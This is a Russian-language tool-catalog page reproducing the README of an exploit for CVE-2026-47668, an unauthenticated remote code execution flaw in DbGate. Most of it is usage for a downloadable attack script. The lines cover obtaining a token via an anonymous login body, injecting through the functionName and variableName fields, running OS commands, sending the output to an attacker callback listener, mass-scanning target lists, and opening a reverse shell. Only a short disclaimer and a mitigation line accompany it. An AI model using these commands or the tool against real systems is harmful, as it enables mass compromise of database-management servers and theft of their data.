Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

Репозиторий
62 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-47668 — Удаленное выполнение кода в DbGate

Неаутентифицированное RCE в DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Инструмент оценки: CVE-2026-47668.py — только для авторизованного тестирования.

CVECVE-2026-47668
КритичностьCritical
ПродуктDbGate / dbgate-serve
Затронуто≤ 7.1.8
Исправлено≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Уязвимость

Название: Неаутентифицированное удаленное выполнение кода в DbGate через JSON Script Runner

Поля, управляемые пользователем (functionName, variableName), внедряются в динамически генерируемый JavaScript без надлежащей проверки. Злоумышленник может выполнить произвольный код в дочернем процессе Node.js runner.

Смягчение: Обновите до 7.1.9+. Ограничьте сетевой доступ, отключите анонимную аутентификацию, смените учетные данные, проверьте логи на подозрительную активность /runners/start.


Контакты

Telegram: @KNxploited


Обзор инструмента

CVE-2026-47668.py проверяет и подтверждает эксплуатацию экземпляров DbGate, которые вы уполномочены тестировать.

Режимы

Результаты

Директория вывода: Nx/ (vuln, dispatch, exfil, failed, list_report, файлы для каждой цели в exfil/)


Установка

root@kitploit:~
pip install -r requirements.txt

Требования: Python 3.9+, aiohttp, colorama


Использование

Мастер AUTO (по умолчанию — без обратной оболочки)

root@kitploit:~
python CVE-2026-47668.py
Ввод по запросуПример
Один URLhttp://192.168.1.10:3000
URL + командаhttp://192.168.1.10:3000|id
Список целейtargets.txt

CLI — включение флага

Каждый запуск CLI обязательно должен включать --cli.

root@kitploit:~
python CVE-2026-47668.py --cli [опции]

Одна цель

-u / --url — целевой базовый URL

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — команда оболочки (по умолчанию: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — только проверка уязвимости (без команды)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — вектор внедрения: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — порт по умолчанию, если в URL не указан порт (по умолчанию: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — использовать существующий Bearer токен

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — настраиваемое тело входа (по умолчанию: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — тайм-аут HTTP в секундах

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — проверять TLS-сертификаты

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfil (по умолчанию в CLI с --cmd)

--callback-host — IP/имя хоста, по которому цель обращается к вашему слушателю

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — локальный адрес для привязки HTTP слушателя (по умолчанию: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — порт HTTP exfil (по умолчанию: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — внешний URL callback (отключает встроенный слушатель)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — время ожидания callback в секундах (одна цель, по умолчанию: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — отправлять вывод без кодировки base64

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — асинхронный exec вместо execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Массовое сканирование (без обратной оболочки)

-f / --file — файл со списком целей

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — количество одновременных потоков (по умолчанию: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — ожидание callback на каждую цель в массовом режиме (по умолчанию: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Массовый режим + настраиваемый порт по умолчанию

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Обратная оболочка (опционально — только для одной цели)

Не требуется для обычного тестирования. Используйте HTTP exfil (--cmd) для подтверждения.

--reverse-shell — цель подключается к LHOST:LPORT (без значения = LAN IP + порт 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — порт, если в --reverse-shell нет :port

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — локальный адрес для прослушивания

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — ожидание TCP (по умолчанию: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — базовое ретранслирование stdin/stdout после подключения

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Примечание для Docker: используйте IP, достижимый из контейнера DbGate (например, шлюз хоста), а не только 127.0.0.1 на вашем ПК.


Список целей (targets.txt)

root@kitploit:~
# комментарий
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Нет порта → автоматически применяется 3000
  • host|command — переопределение команды для строки
  • Отчет: Nx/list_report.txt

Выходные файлы


Рабочий процесс

  1. POST /auth/login → Bearer токен (автоматически, если не указан --token)
  2. Пробник → runner принимает внедрение
  3. POST /runners/start → выполняется команда + HTTP callback (или обратный TCP, если включено)
  4. Классификация → EXFIL = подтвержденный вывод

Отказ от ответственности

Для авторизованного тестирования безопасности только. Вы должны иметь явное разрешение на тестирование любой системы. Автор не несет ответственности за неправильное использование или незаконное использование.


От: Nxploited

Скачать инструмент
ПунктДетали
EndpointPOST /runners/start
AuthТребуется Bearer; токен может быть получен через POST /auth/login в анонимных/стандартных развертываниях
ВнедрениеfunctionName, variableName в JSON assign-командах
ВоздействиеВыполнение команд ОС от имени пользователя процесса DbGate
РежимОбратная оболочкаОписание
AUTOНетОдин ввод; токен + HTTP callback + значения по умолчанию
CLIОпциональноПолный контроль через флаги
MassНетСканирование из targets.txt
--reverse-shellДаОпциональная TCP проверка (только для одной цели)
РезультатЗначение
FAILНедоступен, ошибка аутентификации или не уязвим
VULNRunner принял только пробник
DISPATCHПолезная нагрузка отправлена; нет подтвержденного вывода
EXFILCallback получен — подтвержден вывод команды
REVSHОбратное TCP подключение установлено (только опциональный режим)
ФайлСодержимое
Nx/vuln.txtУязвимые цели (пробник ОК)
Nx/dispatch.txtПолезная нагрузка отправлена, не подтверждено
Nx/exfil.txtПодтвержденные callback'и
Nx/failed.txtНеудачные цели
Nx/exfil/<host>.txtВывод команды для каждой цели
Nx/sessions/<id>/summary.jsonСводка сессии